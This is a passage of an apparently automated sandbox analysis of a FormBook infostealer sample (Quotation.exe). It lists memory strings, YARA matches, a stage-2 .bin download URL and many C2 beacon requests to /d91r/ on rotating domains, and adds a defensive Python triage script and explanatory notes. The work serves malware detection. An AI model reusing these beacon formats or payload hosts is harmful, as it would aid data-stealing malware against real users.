        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl&wn_ca
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_c
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banne
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/wn/img/email/logo-bottom.png
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/wn/img/logo-horizontal.svg
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_logo&wn_campa
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/N
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757935753.0000000003207000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.bin0
        Source: Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binR
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.wittofitentertainment.com/kGQffjENy187.binZ
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknown | HTTP traffic detected: POST /d91r/ HTTP/1.1
            Host: www.cardinialethanol.com
            Connection: close
            Content-Length: 184
            Cache-Control: no-cache
            Origin: http://www.cardinialethanol.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.cardinialethanol.com/d91r/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Raw: 7a 34 3d 38 48 4c 51 72 42 73 6a 77 64 65 56 55 5f 33 79 73 58 4f 4f 45 48 79 6b 4c 70 76 52 41 71 75 70 6b 59 33 32 72 75 4e 52 6a 51 42 61 74 61 50 34 46 66 4a 5f 37 36 4a 6c 4f 46 62 59 34 51 6b 36 56 33 68 46 64 54 61 6a 74 4e 38 30 49 78 51 45 59 58 45 6c 54 37 30 76 5a 6f 65 4f 64 51 54 6f 54 6d 6c 58 72 36 53 75 34 69 6e 5a 6c 4b 77 6d 52 35 7a 52 4a 4f 68 79 76 67 6a 79 64 6f 6a 75 78 4b 56 6d 55 5a 57 69 59 70 38 72 4b 49 57 43 51 48 74 64 61 74 50 4d 62 73 28 32 39 72 56 32 44 59 47 69 75 39 51 58 6e 37 50 42 30 77 50 61 57 67 29 2e 00 00 00 00 00 00 00 00
            Data Ascii: z4=8HLQrBsjwdeVU_3ysXOOEHykLpvRAqupkY32ruNRjQBataP4FfJ_76JlOFbY4Qk6V3hFdTajtN80IxQEYXElT70vZoeOdQToTmlXr6Su4inZlKwmR5zRJOhyvgjydojuxKVmUZWiYp8rKIWCQHtdatPMbs(29rV2DYGiu9QXn7PB0wPaWg).
        Source: unknown | DNS traffic detected: queries for: www.wittofitentertainment.com
        Source: global traffic | HTTP traffic detected: GET /kGQffjENy187.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: www.wittofitentertainment.com
            Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1
            Host: www.interactive-media.ru
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1
            Host: www.cardinialethanol.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1
            Host: www.flaviosilva.online
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1
            Host: www.solya-shop.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1
            Host: www.buymyenergy.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1
            Host: www.184411.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1
            Host: www.b-tek.media
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1
            Host: www.dexmart.xyz
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1
            Host: www.maxhaidt.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1
            Host: www.ghostdyes.net
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1
            Host: www.aznqmd.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1
            Host: www.texasgent.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1
            Host: www.brightfms.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1
            Host: www.eta-trader.net
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1
            Host: www.funvacayflorida.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1
            Host: www.interactive-media.ru
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1
            Host: www.cardinialethanol.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
        Source: unknown | HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
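The requests above share one shape: the same URI path /d91r/ and the same two parameter names sent to fifteen unrelated domains (one of them also by POST), plus a single fetch of a .bin from a separate host that the sample resolved by DNS just before. That is the rotating-host beaconing FormBook is known for, and the .bin fetch is the loader's stage-2 download. The script below is an added triage example, not code from the Joe Sandbox report or from the malware: it groups the report's requests by path, flags a path reused across several hosts as a rotating beacon, separates the parameter whose value never changes (6SE=F8zFuLn, a usable detection token) from the per-request one (z4), and lists the file download as a payload candidate. Hosts, paths and parameter names are transcribed from the entries above; the z4= values are truncated to 16 characters, and the threshold of three hosts is this example's own assumption.

```python
"""Triage the HTTP requests listed in the sandbox report above.

Added example, not code from the Joe Sandbox report. Hosts, paths and
parameter names are transcribed from the "HTTP traffic detected" entries;
the z4= values are truncated to their first 16 characters. The grouping
rules and the min_hosts threshold are this example's own assumptions.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed input, in report order: hosts hit with GET /d91r/?z4=...&6SE=F8zFuLn.
BEACON_HOSTS = [
    ("www.interactive-media.ru", "iC4EpsnjqAMsGvgW"),
    ("www.cardinialethanol.com", "xFjwo0xAzcGZMdvE"),
    ("www.flaviosilva.online", "5uELbA0g21s84RfI"),
    ("www.solya-shop.com", "7PV8upFW6FVa3k/M"),
    ("www.buymyenergy.com", "mm2yDWovojsq98EV"),
    ("www.184411.com", "QRVitphc0g1OIlGq"),
    ("www.b-tek.media", "A3xSHk+fyI7su/gr"),
    ("www.dexmart.xyz", "mny6VZKrhd/9NKVu"),
    ("www.maxhaidt.com", "eODNz5pw0nGnv4SF"),
    ("www.ghostdyes.net", "9I8nCmGbZhqNwxnu"),
    ("www.aznqmd.com", "PMnnsBn+KIOLN/Vf"),
    ("www.texasgent.com", "Cz7EdLoZVVVFkl6A"),
    ("www.brightfms.com", "BFqfPYQ6Rc2mbeko"),
    ("www.eta-trader.net", "hOvML0SIJI9mj/fV"),
    ("www.funvacayflorida.com", "JQY8+24Njt/kPRjD"),
    ("www.interactive-media.ru", "iC4EpsnjqAMsGvgW"),  # repeated in the report
    ("www.cardinialethanol.com", "xFjwo0xAzcGZMdvE"),  # repeated in the report
]

# (method, Host header, request target, body) per report entry.
REPORT_REQUESTS = [
    ("GET", "www.wittofitentertainment.com", "/kGQffjENy187.bin", ""),
    ("POST", "www.cardinialethanol.com", "/d91r/", "z4=8HLQrBsjwdeVU_3y"),
] + [("GET", host, f"/d91r/?z4={z4}&6SE=F8zFuLn", "") for host, z4 in BEACON_HOSTS]


def _params(method, target, body):
    """Parameters the request carries: query string for GET, form body for POST."""
    source = urlsplit(target).query if method == "GET" else body
    return parse_qs(source, keep_blank_values=True)


def find_rotating_beacons(requests, min_hosts=3):
    """Group requests by URI path. A path reused against min_hosts or more
    distinct hosts in one run is a rotating-host beacon: one C2 URI scheme
    walked across a domain list. Parameters with a single value across all
    hosts are stable tokens worth a detection string; the rest carry data."""
    per_path = defaultdict(lambda: {"hosts": set(), "methods": set(),
                                    "values": defaultdict(set)})
    for method, host, target, body in requests:
        entry = per_path[urlsplit(target).path]
        entry["hosts"].add(host)
        entry["methods"].add(method)
        for name, values in _params(method, target, body).items():
            entry["values"][name].update(values)
    beacons = {}
    for path, entry in per_path.items():
        if len(entry["hosts"]) < min_hosts:
            continue
        beacons[path] = {
            "hosts": sorted(entry["hosts"]),
            "methods": sorted(entry["methods"]),
            "constant_params": {n: next(iter(v)) for n, v in entry["values"].items()
                                if len(v) == 1},
            "variable_params": sorted(n for n, v in entry["values"].items()
                                      if len(v) > 1),
        }
    return beacons


def find_payload_downloads(requests, beacon_paths):
    """GET requests for a file-like target outside any beacon rotation. In
    this run that is the single .bin fetch, the loader's stage-2 download."""
    hits = set()
    for method, host, target, _ in requests:
        path = urlsplit(target).path
        if method == "GET" and path not in beacon_paths and "." in path.rsplit("/", 1)[-1]:
            hits.add(host + path)
    return sorted(hits)


def triage(requests, min_hosts=3):
    """Return beacon shapes, payload URLs and the full contacted-domain set."""
    beacons = find_rotating_beacons(requests, min_hosts)
    return {
        "beacons": beacons,
        "payload_downloads": find_payload_downloads(requests, set(beacons)),
        "domains": sorted({host for _, host, _, _ in requests}),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(REPORT_REQUESTS), indent=2))
```

Grouping on the path rather than on the host is the point: each individual GET looks like ordinary browsing, and most of the fifteen domains are decoys, so a per-domain reputation check finds little, while "same path and parameter names against many hosts in a few minutes" is a stable behaviour to alert on. The constant 6SE value and the 7-byte null body on every GET are the two details worth carrying into a network signature for this campaign.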
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

        E-Banking Fraud

        Source: Yara match | File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Spam, unwanted Advertisements and Ransom Demands

        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
        Note: the three distinct strings behind these five hits are MSVC-decorated C++ symbol names, not ransom text. ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ is mozilla::detail::MutexImpl::unlock, ?_Unlock@?$basic_streambuf@... is std::basic_streambuf<char>::_Unlock, and the long run is the contiguous export-name table of a Mozilla module (DllBlocklist_Initialize, profiler_init, mozalloc_abort and the rest). They come from the same two control.exe memory dumps (…22905560816…771A000 and …22957867486…7D72000) that hold the Firefox update, crash-report and telemetry URLs listed above, consistent with the injected process reading Firefox files while harvesting browser data; the only ransom-related token in them is the substring "unlock", so this signature hit does not indicate a ransom demand in the sample.
        Source: control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

        System Summary

        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: initial sample | Static PE information: Filename: Quotation.exe
        Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
